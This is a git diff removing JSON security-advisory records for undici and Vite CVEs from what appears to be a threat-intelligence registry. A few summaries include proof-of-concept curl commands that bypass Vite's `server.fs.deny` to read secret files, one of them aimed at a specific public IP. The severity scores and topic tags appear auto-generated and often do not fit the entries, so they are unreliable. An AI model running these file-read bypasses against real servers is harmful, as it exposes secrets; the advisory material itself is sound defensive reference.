--- a/08-threat-intel/registry/advisories/undici--CVE-2026-1526.json
+++ /dev/null
@@ -1,77 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2026-1526",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression",
-  "summary": "## Description\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\n\nThe vulnerability exists in the `PerMessageDeflate.decompress()` method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.\n\n## Impact\n\n- Remote denial of service against any Node.js application using undici's WebSocket client\n- A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more\n- Memory exhaustion occurs in native/external memory, bypassing V8 heap limits\n- No application-level mitigation is possible as decompression occurs before message delivery\n\n### Patches\n\nUsers should upgrade to fixed versions.\n\n### Workarounds\n\nNo workaround are possible.",
-  "published_at": "2026-03-13T20:41:56Z",
-  "updated_at": "2026-03-13T20:54:25.563997Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2026-1526",
-    "https://hackerone.com/reports/3481206",
-    "https://cna.openjsf.org/security-advisories.html",
-    "https://datatracker.ietf.org/doc/html/rfc7692",
-    "https://github.com/nodejs/undici",
-    "https://owasp.org/www-community/attacks/Denial_of_Service"
-  ],
-  "aliases": [
-    "CVE-2026-1526",
-    "GHSA-vrm6-8vpv-qv8q"
-  ],
-  "cve_ids": [
-    "CVE-2026-1526"
-  ],
-  "ghsa_ids": [
-    "GHSA-vrm6-8vpv-qv8q"
-  ],
-  "osv_ids": [
-    "GHSA-vrm6-8vpv-qv8q"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<6.24.0",
-    "introduced=7.0.0, fixed<7.24.0"
-  ],
-  "fixed_versions": [
-    "6.24.0",
-    "7.24.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary",
-    "plugin-extension-trust-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-1527.json b/08-threat-intel/registry/advisories/undici--CVE-2026-1527.json
deleted file mode 100644
index aa3f4f77..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2026-1527.json
+++ /dev/null
@@ -1,74 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2026-1527",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici has CRLF Injection in undici via `upgrade` option",
-  "summary": "### Impact\n\nWhen an application passes user-controlled input to the `upgrade` option of `client.request()`, an attacker can inject CRLF sequences (`\\r\\n`) to:\n\n1. Inject arbitrary HTTP headers\n2. Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)\n\nThe vulnerability exists because undici writes the `upgrade` value directly to the socket without validating for invalid header characters:\n\n```javascript\n// lib/dispatcher/client-h1.js:1121\nif (upgrade) {\n  header += `connection: upgrade\\r\\nupgrade: ${upgrade}\\r\\n`\n}\n```\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nSanitize the `upgrade` option string before passing to undici:\n\n```javascript\nfunction sanitizeUpgrade(value) {\n  if (/[\\r\\n]/.test(value)) {\n    throw new Error('Invalid upgrade value')\n  }\n  return value\n}\n\nclient.request({\n  upgrade: sanitizeUpgrade(userInput)\n})\n```",
-  "published_at": "2026-03-13T20:41:26Z",
-  "updated_at": "2026-03-13T20:54:25.572106Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2026-1527",
-    "https://hackerone.com/reports/3487198",
-    "https://cna.openjsf.org/security-advisories.html",
-    "https://github.com/nodejs/undici"
-  ],
-  "aliases": [
-    "CVE-2026-1527",
-    "GHSA-4992-7rv2-5pvq"
-  ],
-  "cve_ids": [
-    "CVE-2026-1527"
-  ],
-  "ghsa_ids": [
-    "GHSA-4992-7rv2-5pvq"
-  ],
-  "osv_ids": [
-    "GHSA-4992-7rv2-5pvq"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<6.24.0",
-    "introduced=7.0.0, fixed<7.24.0"
-  ],
-  "fixed_versions": [
-    "6.24.0",
-    "7.24.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-1528.json b/08-threat-intel/registry/advisories/undici--CVE-2026-1528.json
deleted file mode 100644
index ee7a7d23..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2026-1528.json
+++ /dev/null
@@ -1,74 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2026-1528",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client",
-  "summary": "### Impact\nA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. \n\n### Patches\n\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nThere are no workarounds.",
-  "published_at": "2026-03-13T20:07:26Z",
-  "updated_at": "2026-03-14T09:17:45.838435Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2026-1528",
-    "https://hackerone.com/reports/3537648",
-    "https://cna.openjsf.org/security-advisories.html",
-    "https://github.com/nodejs/undici"
-  ],
-  "aliases": [
-    "CVE-2026-1528",
-    "GHSA-f269-vfmq-vjvj"
-  ],
-  "cve_ids": [
-    "CVE-2026-1528"
-  ],
-  "ghsa_ids": [
-    "GHSA-f269-vfmq-vjvj"
-  ],
-  "osv_ids": [
-    "GHSA-f269-vfmq-vjvj"
-  ],
-  "affected_versions": [
-    "introduced=6.0.0, fixed<6.24.0",
-    "introduced=7.0.0, fixed<7.24.0"
-  ],
-  "fixed_versions": [
-    "6.24.0",
-    "7.24.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-22036.json b/08-threat-intel/registry/advisories/undici--CVE-2026-22036.json
deleted file mode 100644
index 5754d354..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2026-22036.json
+++ /dev/null
@@ -1,73 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2026-22036",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion",
-  "summary": "### Impact\n\nThe `fetch()` API supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., Content-Encoding: gzip, br). This is also supported by the undici decompress interceptor.\n\nHowever, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation.\n\n### Patches\n\nUpgrade to 7.18.2 or 6.23.0.\n\n### Workarounds\n\nIt is possible to apply an undici interceptor and filter long `Content-Encoding` sequences manually.\n\n### References\n\n* https://hackerone.com/reports/3456148\n* https://github.com/advisories/GHSA-gm62-xv2j-4w53\n* https://curl.se/docs/CVE-2022-32206.html",
-  "published_at": "2026-01-14T21:06:08Z",
-  "updated_at": "2026-02-04T02:56:17.456091Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2026-22036",
-    "https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3",
-    "https://github.com/nodejs/undici"
-  ],
-  "aliases": [
-    "CVE-2026-22036",
-    "GHSA-g9mf-h72j-4rw9"
-  ],
-  "cve_ids": [
-    "CVE-2026-22036"
-  ],
-  "ghsa_ids": [
-    "GHSA-g9mf-h72j-4rw9"
-  ],
-  "osv_ids": [
-    "GHSA-g9mf-h72j-4rw9"
-  ],
-  "affected_versions": [
-    "introduced=7.0.0, fixed<7.18.2",
-    "introduced=0, fixed<6.23.0"
-  ],
-  "fixed_versions": [
-    "7.18.2",
-    "6.23.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-2229.json b/08-threat-intel/registry/advisories/undici--CVE-2026-2229.json
deleted file mode 100644
index 2e53e906..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2026-2229.json
+++ /dev/null
@@ -1,77 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2026-2229",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation",
-  "summary": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
-  "published_at": "2026-03-13T20:41:41Z",
-  "updated_at": "2026-03-13T20:54:26.149214Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2026-2229",
-    "https://hackerone.com/reports/3487486",
-    "https://cna.openjsf.org/security-advisories.html",
-    "https://datatracker.ietf.org/doc/html/rfc7692",
-    "https://github.com/nodejs/undici",
-    "https://nodejs.org/api/zlib.html#class-zlibinflateraw"
-  ],
-  "aliases": [
-    "CVE-2026-2229",
-    "GHSA-v9p9-hfj2-hcw8"
-  ],
-  "cve_ids": [
-    "CVE-2026-2229"
-  ],
-  "ghsa_ids": [
-    "GHSA-v9p9-hfj2-hcw8"
-  ],
-  "osv_ids": [
-    "GHSA-v9p9-hfj2-hcw8"
-  ],
-  "affected_versions": [
-    "introduced=0, fixed<6.24.0",
-    "introduced=7.0.0, fixed<7.24.0"
-  ],
-  "fixed_versions": [
-    "6.24.0",
-    "7.24.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary",
-    "plugin-extension-trust-policy"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-2581.json b/08-threat-intel/registry/advisories/undici--CVE-2026-2581.json
deleted file mode 100644
index bd2bb091..00000000
--- a/08-threat-intel/registry/advisories/undici--CVE-2026-2581.json
+++ /dev/null
@@ -1,72 +0,0 @@
-{
-  "canonical_id": "undici--CVE-2026-2581",
-  "system_id": "undici",
-  "display_name": "Undici",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS",
-  "summary": "## Impact\nThis is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\n\nIn vulnerable Undici versions, when `interceptors.deduplicate()` is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\n\nImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\n\n## Patches\n\nThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\n\nUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.\n\n## Workarounds\nIf upgrading immediately is not possible:\n\n- Disable `interceptors.deduplicate()` for affected clients/routes.\n- Use `skipHeaderNames` with a marker header to force high-risk requests to bypass deduplication.\n- Avoid concurrent identical requests to untrusted endpoints that may return very large/chunked bodies.\n- Apply upstream/proxy response-size and timeout limits.",
-  "published_at": "2026-03-13T20:37:58Z",
-  "updated_at": "2026-03-13T20:54:25.417862Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2026-2581",
-    "https://hackerone.com/reports/3513473",
-    "https://cna.openjsf.org/security-advisories.html",
-    "https://github.com/nodejs/undici"
-  ],
-  "aliases": [
-    "CVE-2026-2581",
-    "GHSA-phc3-fgpg-7m6h"
-  ],
-  "cve_ids": [
-    "CVE-2026-2581"
-  ],
-  "ghsa_ids": [
-    "GHSA-phc3-fgpg-7m6h"
-  ],
-  "osv_ids": [
-    "GHSA-phc3-fgpg-7m6h"
-  ],
-  "affected_versions": [
-    "introduced=7.17.0, fixed<7.24.0"
-  ],
-  "fixed_versions": [
-    "7.24.0"
-  ],
-  "package_name": "undici",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md",
-  "secure_code_topics": [
-    "ssrf-url-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "ssrf-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Undici"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2024-23331.json b/08-threat-intel/registry/advisories/vite--CVE-2024-23331.json
deleted file mode 100644
index c7db3322..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2024-23331.json
+++ /dev/null
@@ -1,83 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2024-23331",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem",
-  "summary": "### Summary\n[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.\n\nThis bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.\n\n### Patches\nFixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17\n\n### Details\nSince `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. \n\nSee `picomatch`  usage, where `nocase` is defaulted to `false`: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632\n\nBy requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. \n\n### PoC\n**Setup**\n1. Created vanilla Vite project using `npm create vite@latest` on a Standard Azure hosted Windows 10 instance. \n    - `npm run dev -- --host 0.0.0.0`\n    - Publicly accessible for the time being here: http://20.12.242.81:5173/ \n2. Created dummy secret files, e.g. `custom.secret` and `production.pem`\n3. Populated `vite.config.js` with\n```javascript\nexport default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }\n```\n\n**Reproduction**\n1. `curl -s http://20.12.242.81:5173/@fs//`\n    - Descriptive error page reveals absolute filesystem path to project root\n2. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js`\n    - Discoverable configuration file reveals locations of secrets\n3. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT`\n    - Secrets are directly accessible using case-augmented version of filename\n\n**Proof**\n![Screenshot 2024-01-19 022736](https://user-images.githubusercontent.com/907968/298020728-3a8d3c06-fcfd-4009-9182-e842f66a6ea5.png)\n\n### Impact\n**Who**\n- Users with exposed dev servers on environments with case-insensitive filesystems\n\n**What**\n- Files protected by `server.fs.deny` are both discoverable, and accessible",
-  "published_at": "2024-01-19T21:58:47Z",
-  "updated_at": "2026-02-04T04:17:01.410592Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2023-34092",
-    "https://nvd.nist.gov/vuln/detail/CVE-2024-23331",
-    "https://github.com/vitejs/vite/commit/0cd769c279724cf27934b1270fbdd45d68217691",
-    "https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5",
-    "https://github.com/vitejs/vite/commit/a26c87d20f9af306b5ce3ff1648be7fa5146c278",
-    "https://github.com/vitejs/vite/commit/eeec23bbc9d476c54a3a6d36e78455867185a7cb",
-    "https://github.com/vitejs/vite",
-    "https://vitejs.dev/config/server-options.html#server-fs-deny"
-  ],
-  "aliases": [
-    "CVE-2024-23331",
-    "GHSA-c24v-8rfc-w8vw"
-  ],
-  "cve_ids": [
-    "CVE-2024-23331"
-  ],
-  "ghsa_ids": [
-    "GHSA-c24v-8rfc-w8vw"
-  ],
-  "osv_ids": [
-    "GHSA-c24v-8rfc-w8vw"
-  ],
-  "affected_versions": [
-    "introduced=2.7.0, fixed<2.9.17",
-    "introduced=3.0.0, fixed<3.2.8",
-    "introduced=4.0.0, fixed<4.5.2",
-    "introduced=5.0.0, fixed<5.0.12"
-  ],
-  "fixed_versions": [
-    "2.9.17",
-    "3.2.8",
-    "4.5.2",
-    "5.0.12"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2024-45811.json b/08-threat-intel/registry/advisories/vite--CVE-2024-45811.json
deleted file mode 100644
index afc02a71..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2024-45811.json
+++ /dev/null
@@ -1,86 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2024-45811",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
-  "summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n    <body>\n      <h1>403 Restricted</h1>\n      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
-  "published_at": "2024-09-17T18:44:12Z",
-  "updated_at": "2026-02-04T04:05:31.919291Z",
-  "severity": "low",
-  "cvss_score": 3.1,
-  "exploit_status": "unknown",
-  "source_confidence": "official",
-  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx",
-  "secondary_source_urls": [
-    "https://nvd.nist.gov/vuln/detail/CVE-2024-45811",
-    "https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249",
-    "https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34",
-    "https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd",
-    "https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6",
-    "https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7",
-    "https://github.com/vitejs/vite"
-  ],
-  "aliases": [
-    "CVE-2024-45811",
-    "GHSA-9cwx-2883-4wfx"
-  ],
-  "cve_ids": [
-    "CVE-2024-45811"
-  ],
-  "ghsa_ids": [
-    "GHSA-9cwx-2883-4wfx"
-  ],
-  "osv_ids": [
-    "GHSA-9cwx-2883-4wfx"
-  ],
-  "affected_versions": [
-    "introduced=5.4.0, fixed<5.4.6",
-    "introduced=5.3.0, fixed<5.3.6",
-    "introduced=5.2.0, fixed<5.2.14",
-    "introduced=4.0.0, fixed<4.5.4",
-    "introduced=0, fixed<3.2.11",
-    "introduced=5.0.0, fixed<5.1.8"
-  ],
-  "fixed_versions": [
-    "5.4.6",
-    "5.3.6",
-    "5.2.14",
-    "4.5.4",
-    "3.2.11",
-    "5.1.8"
-  ],
-  "package_name": "vite",
-  "render_markdown": true,
-  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md",
-  "secure_code_topics": [
-    "dependency-upgrade-policy",
-    "file-upload-validation",
-    "proxy-trust-boundary"
-  ],
-  "status": "generated",
-  "triage_reasons": [],
-  "verification_status": "triage-manual",
-  "verification_mode": "synthetic",
-  "last_verified_at": null,
-  "last_run_id": null,
-  "evidence_bundle": null,
-  "browser_evidence": {
-    "required": false,
-    "present": false,
-    "refs": []
-  },
-  "repro_profile_id": "proxy-boundary-generic",
-  "artifact_mode": "synthetic",
-  "blocked_reason": null,
-  "metadata": {
-    "source_names": [
-      "OSV Vite"
-    ],
-    "source_kinds": [
-      "osv-batch"
-    ],
-    "candidate_count": 1
-  }
-}
diff --git a/08-threat-intel/registry/advisories/vite--CVE-2024-45812.json b/08-threat-intel/registry/advisories/vite--CVE-2024-45812.json
deleted file mode 100644
index 9a41877b..00000000
--- a/08-threat-intel/registry/advisories/vite--CVE-2024-45812.json
+++ /dev/null
@@ -1,92 +0,0 @@
-{
-  "canonical_id": "vite--CVE-2024-45812",
-  "system_id": "vite",
-  "display_name": "Vite",
-  "category": "frameworks",
-  "advisory_mode": "core",
-  "title": "Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS",
-  "summary": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.\n\nNote that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\n\n### Details\n\n**Backgrounds**\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n**Gadgets found in Vite**\n\nWe have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`.\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n```\nconst relativeUrlMechanisms = {\n  amd: (relativePath) => {\n    if (relativePath[0] !== \".\") relativePath = \"./\" + relativePath;\n    return getResolveUrl(\n      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`\n    );\n  },\n  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(\n    relativePath\n  )} : ${getRelativeUrlFromDocument(relativePath)})`,\n  es: (relativePath) => getResolveUrl(\n    